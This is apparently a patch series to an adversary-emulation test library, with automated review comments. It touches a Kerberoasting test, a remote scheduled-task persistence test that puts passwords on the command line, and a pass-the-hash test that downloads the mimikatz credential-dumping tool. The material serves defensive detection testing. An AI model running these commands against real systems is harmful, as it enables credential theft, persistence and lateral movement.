From fe4485d818afd7bde97c262ecd80b36708ca7543 Mon Sep 17 00:00:00 2001
From: Carrie Roberts
Date: Fri, 30 Jul 2021 16:57:50 -0600
Subject: [PATCH 1/6] add domain joined check (#1577)
---
 atomics/T1558.003/T1558.003.yaml | 7 +++++++
 1 file changed, 7 insertions(+)
diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml
index e941e8ec..58abe080 100644
--- a/atomics/T1558.003/T1558.003.yaml
+++ b/atomics/T1558.003/T1558.003.yaml
@@ -12,6 +12,13 @@ atomic_tests:
     If the testing domain doesn't have any service principal name configured, there is no output
   supported_platforms:
   - windows
+  dependencies:
+  - description: |
+      Computer must be domain joined
+    prereq_command: |
+      if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Write-Host Joining this computer to a domain must be done manually
   executor:
     command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
From 67c6569748e5a79d83544510e8211700faedde40 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Fri, 30 Jul 2021 22:58:17 +0000
Subject: [PATCH 2/6] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 atomics/Indexes/index.yaml     | 12 ++++++++++++
 atomics/T1558.003/T1558.003.md | 12 ++++++++++++
 2 files changed, 24 insertions(+)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 751f537e..76205d85 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
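Review bot: The new get_prereq_command at the end of the added dependency block only prints a message and then exits 0, so a runner that takes a zero status as "prerequisite now satisfied" has nothing to distinguish this manual step from a successful automated fix; if the runner re-checks prereq_command afterwards this is harmless, but an explicit failure status makes the intent unambiguous: `Write-Host "Joining this computer to a domain must be done manually"; exit 1`. In prereq_command, `-Class` resolves only by PowerShell's parameter-prefix matching; the documented parameter is `-ClassName`, so `if((Get-CimInstance -ClassName Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}` reads the same in every version and survives a future parameter addition that starts with "Class". The literal block scalar `|` keeps a trailing newline on the description, which is why the generated index renders it as a quoted string with an empty line; `|-` would strip it if that matters to consumers.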
@@ -2345,6 +2345,18 @@ credential-access:
         there is no output\n"
       supported_platforms:
       - windows
+      dependencies:
+      - description: 'Computer must be domain joined
+
+'
+        prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
+          {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host Joining this computer to a domain must be
+          done manually
+
+'
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md
index a3155891..a2b11589 100644
--- a/atomics/T1558.003/T1558.003.md
+++ b/atomics/T1558.003/T1558.003.md
@@ -47,6 +47,18 @@ Invoke-Kerberoast | fl
+#### Dependencies:  Run with `powershell`!
+##### Description: Computer must be domain joined
+##### Check Prereq Commands:
+```powershell
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host Joining this computer to a domain must be done manually
+```
+
+
From 9bf1327611ef4deccad808d99d78245769ca551e Mon Sep 17 00:00:00 2001
From: Carrie Roberts
Date: Fri, 30 Jul 2021 17:00:00 -0600
Subject: [PATCH 3/6] fix cleanup command (#1575)
---
 atomics/T1053.005/T1053.005.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml
index 59a7b460..457cc87d 100644
--- a/atomics/T1053.005/T1053.005.yaml
+++ b/atomics/T1053.005/T1053.005.yaml
@@ -77,7 +77,7 @@ atomic_tests:
     command: |
       SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
     cleanup_command: |
-      SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /F >nul 2>&1
+      SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1
 
 - name: Powershell Cmdlet Scheduled Task
   auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
From c5d92e8cc058f6a3a8183fa1ffa3d522fd3d0c7c Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Fri, 30 Jul 2021 23:00:49 +0000
Subject: [PATCH 4/6] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 atomics/Indexes/index.yaml     | 6 +++---
 atomics/T1053.005/T1053.005.md | 2 +-
 2 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 76205d85..6d0006fd 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -16382,7 +16382,7 @@ privilege-escalation:
         "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
 
         '
-      cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password}
+      cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
         /TN "Atomic task" /F >nul 2>&1
 
         '
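Review bot: The corrected cleanup_command still ends in `>nul 2>&1`, so when the `/U`/`/P` connection to `#{target}` fails (wrong credentials, host unreachable, task never created) the deletion error is discarded and the "Atomic task" entry is left on the target with nothing in the test output to say so; a cleanup that silently leaves persistence behind is the case a harness most needs to surface. Keep stdout quiet but let stderr through: `SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul`. Note for anyone correlating this test with telemetry that both the create line (`/RP`) and this delete line (`/P`) place the password on the process command line, so it will appear verbatim in process-creation logging on the runner; that is inherent to the SCHTASKS switches used and worth a one-line comment in the test description. The same textual change is mirrored in the generated index.yaml and T1053.005.md hunks in this series (patch 4), which the doc generator rewrites, so only this source file needs the edit.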
@@ -44749,7 +44749,7 @@ persistence:
         "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
 
         '
-      cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password}
+      cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
         /TN "Atomic task" /F >nul 2>&1
 
         '
@@ -60612,7 +60612,7 @@ execution:
         "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
 
         '
-      cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password}
+      cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
         /TN "Atomic task" /F >nul 2>&1
 
         '
diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md
index a2a34da5..592679bd 100644
--- a/atomics/T1053.005/T1053.005.md
+++ b/atomics/T1053.005/T1053.005.md
@@ -129,7 +129,7 @@ SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task"
 
 #### Cleanup Commands:
 ```cmd
-SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /F >nul 2>&1
+SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1
 ```
From 51f463605ca856a38412b1ebd49359d261b6c7e4 Mon Sep 17 00:00:00 2001
From: Carrie Roberts
Date: Fri, 30 Jul 2021 17:01:31 -0600
Subject: [PATCH 5/6] update mimikatz download URL (#1576)
---
 atomics/T1550.002/T1550.002.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/atomics/T1550.002/T1550.002.yaml b/atomics/T1550.002/T1550.002.yaml
index fbb85382..416e222d 100644
--- a/atomics/T1550.002/T1550.002.yaml
+++ b/atomics/T1550.002/T1550.002.yaml
@@ -34,7 +34,7 @@ atomic_tests:
       if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
     get_prereq_command: |
       $mimikatz_path = cmd /c echo #{mimikatz_path}
-      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
       Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
       New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
       Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
From b994e94e4028f8e60d7deadb80ca1d2a42a7d569 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Fri, 30 Jul 2021 23:02:02 +0000
Subject: [PATCH 6/6] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 atomics/Indexes/index.yaml     | 4 ++--
 atomics/T1550.002/T1550.002.md | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 6d0006fd..631c63eb 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -30038,7 +30038,7 @@ defense-evasion:
         if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
       get_prereq_command: |
         $mimikatz_path = cmd /c echo #{mimikatz_path}
-        Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+        Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
         Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
         New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
         Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
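Review bot: The updated Invoke-WebRequest line in get_prereq_command still fetches the release archive and hands it straight to Expand-Archive and Move-Item with no integrity check, so the test fixture that lands at `#{mimikatz_path}` is whatever the download endpoint served at that moment; since the URL is now pinned to one fixed release, its digest can be pinned too. Add a verification step between the download and the extraction, e.g. `if ((Get-FileHash "$env:TEMP\mimikatz.zip" -Algorithm SHA256).Hash -ne '<EXPECTED_SHA256_OF_2.2.0-20210724_ZIP>') { throw 'mimikatz_trunk.zip hash mismatch' }`, with the placeholder replaced by the digest recorded from the release at pin time. The get_prereq_command block may continue past the Move-Item line that closes this hunk, so the throw should be the last thing that runs before any later step relies on the file. The identical URL change is repeated in the generated index.yaml and T1550.002.md hunks of patch 6, which the doc generator regenerates from this file.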
@@ -62522,7 +62522,7 @@ lateral-movement:
         if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
       get_prereq_command: |
         $mimikatz_path = cmd /c echo #{mimikatz_path}
-        Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+        Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
         Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
         New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
         Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md
index d0fc6f04..14e71e5b 100644
--- a/atomics/T1550.002/T1550.002.md
+++ b/atomics/T1550.002/T1550.002.md
@@ -57,7 +57,7 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force